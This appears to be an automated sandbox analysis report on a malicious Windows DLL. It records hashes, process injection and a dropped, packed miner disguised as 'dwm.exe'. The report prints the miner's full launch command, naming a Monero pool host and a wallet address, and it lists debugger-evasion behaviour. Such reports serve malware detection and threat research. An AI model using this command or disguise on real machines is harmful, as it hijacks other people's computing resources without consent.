Analysis
- max time kernel: 150s
- max time network: 59s
- platform: windows7_x64
- resource: win7-20220901-en
- resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
- submitted: 25-11-2022 07:59
Static task: static1
Behavioral task: behavioral1
- Sample: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
- Resource: win7-20220901-en
Behavioral task: behavioral2
- Sample: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
- Resource: win10v2004-20220901-en
General
- Target: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll
- Size: 4.6MB
- MD5: f42201e1867d4b345373296577d40035
- SHA1: b691363aa20b1d7681c7557a6aa40f3596416555
- SHA256: 41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea
- SHA512: 4fac587eaa45e085b210b55164f928493af98911addc429772e5a45d5b205635ff846264a07e529a5d13d20f0b7ac2042139f44a036c3a2dae6f933f307461e6
- SSDEEP: 98304:4STCsrzPn/z33xlGTvgLkbYWtYAMrbL3uxEqO0c5l:4SpzP/z378vokb8AMrbL+xEj0cT
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes: pid 1168 dwm.exe
  YARA rule matches (rule: vmprotect):
    \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
    C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
    \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
    C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
    behavioral1/memory/1168-61-0x000000013FA40000-0x000000013FDED000-memory.dmp
    behavioral1/memory/1168-64-0x000000013FA40000-0x000000013FDED000-memory.dmp
    behavioral1/memory/1168-66-0x000000013FA40000-0x000000013FDED000-memory.dmp
- Loads dropped DLL (2 IoCs)
  Processes: pid 1260 rundll32.exe; pid 996
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes: pid 1168 dwm.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: pid 1260 rundll32.exe (all 64 entries)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: pid 1168 dwm.exe, Token: SeLockMemoryPrivilege
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes: pid 1260 rundll32.exe (2 entries)
- Suspicious use of WriteProcessMemory (11 IoCs)
  Processes (source pid / source process -> target pid / target process):
    1364 rundll32.exe wrote to memory of 1260 rundll32.exe (7 entries)
    1260 rundll32.exe wrote to memory of 1168 dwm.exe (4 entries)
Processes
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\41b660e5e3e0af00a8b8a78bc18e9c691781d0a0ebab9fe54bdc0918dc0bc6ea.dll,#1
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.2
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
  Filesize: 1.5MB
  MD5: eedb9d86ae8abc65fa7ac7c6323d4e8f
  SHA1: ce1fbf382e89146ea5a22ae551b68198c45f40e4
  SHA256: d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
  SHA512: 9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
- \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
  Filesize: 1.5MB
  MD5: eedb9d86ae8abc65fa7ac7c6323d4e8f
  SHA1: ce1fbf382e89146ea5a22ae551b68198c45f40e4
  SHA256: d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
  SHA512: 9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
- memory/1168-57-0x0000000000000000-mapping.dmp
- memory/1168-61-0x000000013FA40000-0x000000013FDED000-memory.dmp (Filesize: 3.7MB)
- memory/1168-64-0x000000013FA40000-0x000000013FDED000-memory.dmp (Filesize: 3.7MB)
- memory/1168-66-0x000000013FA40000-0x000000013FDED000-memory.dmp (Filesize: 3.7MB)
- memory/1260-54-0x0000000000000000-mapping.dmp
- memory/1260-55-0x0000000075091000-0x0000000075093000-memory.dmp (Filesize: 8KB)
- memory/1260-65-0x00000000023C0000-0x000000000276D000-memory.dmp (Filesize: 3.7MB)